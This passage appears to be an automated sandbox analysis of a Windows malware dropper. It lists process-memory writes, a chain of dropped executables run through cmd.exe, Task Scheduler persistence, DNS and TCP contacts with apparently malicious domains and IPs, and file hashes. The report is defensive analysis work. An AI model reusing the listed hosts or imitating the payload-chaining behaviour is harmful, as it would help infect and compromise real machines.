PID 2024 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe
PID 2360 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe
PID 1576 wrote to memory of 1288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe
PID 1576 wrote to memory of 1288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe
PID 1576 wrote to memory of 1288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe
PID 1436 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 1436 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 1436 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 2896 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe
PID 2896 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe
PID 2896 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe
PID 3712 wrote to memory of 4820 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\81edfb0db828.exe
PID 3712 wrote to memory of 4820 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\81edfb0db828.exe
PID 1192 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\7da174d16d4.exe
PID 1192 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\7da174d16d4.exe
PID 1192 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\7da174d16d4.exe
PID 3068 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\27e380c23ad33.exe
PID 3068 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\27e380c23ad33.exe
PID 4592 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\cb3f07883441a5d6.exe
PID 4592 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\cb3f07883441a5d6.exe
PID 4592 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\cb3f07883441a5d6.exe
PID 1588 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe
PID 1588 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe
PID 3876 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3876 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3876 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2472 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 2472 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 2472 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe
PID 1288 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 1288 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 1288 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1288 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1288 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\setup.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe

"C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0035b9e6fdaf9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe

53d58f3832.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe" -a

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 576

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2024 -ip 2024

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe

0035b9e6fdaf9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\27e380c23ad33.exe

27e380c23ad33.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\cb3f07883441a5d6.exe

cb3f07883441a5d6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\7da174d16d4.exe

7da174d16d4.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704621818 0

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\81edfb0db828.exe

81edfb0db828.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe

731da7284717.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe

0b0f89497d35095.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe

95714f41791.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 81edfb0db828.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cb3f07883441a5d6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 731da7284717.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0b0f89497d35095.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 27e380c23ad33.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 7da174d16d4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53d58f3832.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 95714f41791.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2516 -ip 2516

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.186.192:443 ipinfo.io tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 53.96.141.3.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 172.67.132.113:443 iplogger.org tcp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 22.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
MD 176.123.2.239:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.11.8:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 aucmoney.com udp
US 8.8.8.8:53 thegymmum.com udp
US 8.8.8.8:53 atvcampingtrips.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 kuapakualaman.com udp
US 8.8.8.8:53 renatazarazua.com udp
US 8.8.8.8:53 nasufmutlu.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
N/A 127.0.0.1:52449 tcp
N/A 127.0.0.1:52451 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe

MD5 a79f8609262355ef1539aed4d5471a63
SHA1 86658bba60a1e3d4972da614087e8825c2646d2e
SHA256 8d87a4093c7c0e39ba64bd47acd82719307037e086fa907ed530d505ea8b3540
SHA512 bd7bf9f7a215a09d063e9ec8514a46614d4f3f39013390ca665244644d78d7812c7e99c75c21076d7bea3cdebcbaa4cbd231733cc0a78da6f9d6cd4896546c0d

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe

MD5 fec53691cc3e034b6967a3340a0c15c8
SHA1 092651002570c17d9b493bc5d4ad194c91e16136
SHA256 ad665a1dd391bfaae019bb51ba72b0791c17e892acc3efd69aa7e14849ba9a16
SHA512 695f79e12b1465c07916a40db9086c0548d280ab8b615b6469a6157ed7ce669a8193474a782453b397d56929f32031b0cef445af66c62ed148e8ef99d9b3d48b

memory/2024-32-0x0000000000C60000-0x0000000000CEF000-memory.dmp

memory/2024-34-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2024-38-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-41-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-44-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1068-96-0x0000000000FA0000-0x0000000000FCC000-memory.dmp

memory/1288-103-0x00000000734D0000-0x0000000073C80000-memory.dmp

memory/756-106-0x0000000000C70000-0x0000000000DB2000-memory.dmp

memory/756-111-0x0000000005C10000-0x00000000061B4000-memory.dmp

memory/756-113-0x0000000005700000-0x0000000005792000-memory.dmp

memory/1068-112-0x00000000017A0000-0x00000000017A6000-memory.dmp

memory/4972-126-0x0000000000990000-0x00000000009A0000-memory.dmp

memory/756-134-0x0000000005690000-0x000000000569A000-memory.dmp

memory/2296-136-0x0000000004840000-0x00000000048DD000-memory.dmp

memory/1288-139-0x00000000734D0000-0x0000000073C80000-memory.dmp

memory/756-137-0x00000000059D0000-0x0000000005A6C000-memory.dmp

memory/1068-138-0x000000001BEE0000-0x000000001BEF0000-memory.dmp

memory/4140-128-0x0000000000400000-0x0000000002C72000-memory.dmp

memory/2296-140-0x0000000000400000-0x0000000002CCE000-memory.dmp

memory/4140-109-0x0000000004780000-0x0000000004789000-memory.dmp

memory/1068-108-0x0000000001780000-0x00000000017A0000-memory.dmp

memory/4140-107-0x0000000002E90000-0x0000000002F90000-memory.dmp

memory/4972-141-0x00007FFCBDC40000-0x00007FFCBE701000-memory.dmp

memory/4820-105-0x000000001ACC0000-0x000000001ACD0000-memory.dmp

memory/1068-102-0x0000000001770000-0x0000000001776000-memory.dmp

memory/1068-142-0x00007FFCBDC40000-0x00007FFCBE701000-memory.dmp

memory/4820-97-0x00007FFCBDC40000-0x00007FFCBE701000-memory.dmp

memory/2296-144-0x0000000002D50000-0x0000000002E50000-memory.dmp

memory/756-143-0x00000000734D0000-0x0000000073C80000-memory.dmp

memory/1288-91-0x00000000003F0000-0x00000000004DE000-memory.dmp

memory/4820-81-0x00000000000D0000-0x00000000000D8000-memory.dmp

memory/3660-145-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/1448-157-0x0000000000B30000-0x0000000000C14000-memory.dmp

memory/2024-163-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2024-161-0x0000000000400000-0x00000000009DB000-memory.dmp

memory/2024-166-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2024-167-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2024-168-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-165-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3328-169-0x0000000000ED0000-0x0000000000EE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe

MD5 7983e14af3ba9fe1981d33b1a1fbfebb
SHA1 c78e705114c3e8f31402e1048c74626fe68f3321
SHA256 a1da52dabeaff4e9712949548cce00c8786b59fb1187d9823b94d2e7ca75e75f
SHA512 473544e7492300ff70d3d64d7b3610f0ca9edccf6768722b832eac4df5d63d09f05fed070cb53477f8939be776a0b7661c263fe17ab68693d9e1a70e39935ce9

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

memory/4140-170-0x0000000000400000-0x0000000002C72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe

MD5 3fffde8679f15a688d99b5206957271a
SHA1 1668e52fdbc2822f0b032859ba225d0b05012538
SHA256 bad9ea3883bad46c6b1be8094cd9cfe28db41a981eb0ce5f4aa1c76193e6a1bf
SHA512 9d9c9e86821d8ee95f4ae46892e66500f221df983391b07148203d335c96a297b49339cc8515f8b862a333ae3eb7286641039f3461e8c4af915de58b6af0c3c7

memory/2024-43-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2024-42-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-40-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-39-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-37-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2024-35-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2024-36-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2024-33-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2024-28-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/756-182-0x0000000002FA0000-0x0000000002FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe

MD5 3b68307657ddbfa9e4c8944872a14836
SHA1 e4e2bfc2f5519af5e633a8e1b8120aecabde517f
SHA256 6684153e0baae31eddfc744ca7a28a6897df073e467ebf138f2df5604c726c0d
SHA512 c60a8b4e74b12d006a790388f9f44e180cd3849842dee7fd4e4bff330640eb262714070eb11f8ac66904f0a63d11b5bd152e76be2aa0dbef813f6d42428f48ab

memory/4820-186-0x000000001ACC0000-0x000000001ACD0000-memory.dmp

memory/756-187-0x0000000005640000-0x0000000005650000-memory.dmp

memory/2296-188-0x0000000002D50000-0x0000000002E50000-memory.dmp

memory/4972-190-0x000000001CD30000-0x000000001CD32000-memory.dmp

memory/4972-189-0x0000000002F00000-0x0000000002F0E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 a628baa97881fa5528009c9470cadee0
SHA1 583aa730e302fe0015cdb0dee4e279f193d66d87
SHA256 e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5
SHA512 c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 74bb44fc17b7b248a53c01eeb2d5b12a
SHA1 bd87175dbaf456e68e119c3c914d0f2686688c02
SHA256 305dd91a561dfe917bd077f43d9290567cf0c58291bca6e503d3d7ad39d02197
SHA512 33db4bfa67a6bbadf7296d38eace01023d7aa742ac36cea90835097df829b6cc74f3d0e496e965415fe4eacda2aca9b10538f3223317db06d215dd55b3a55f85

C:\Users\Admin\AppData\Local\Temp\7zS396A.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc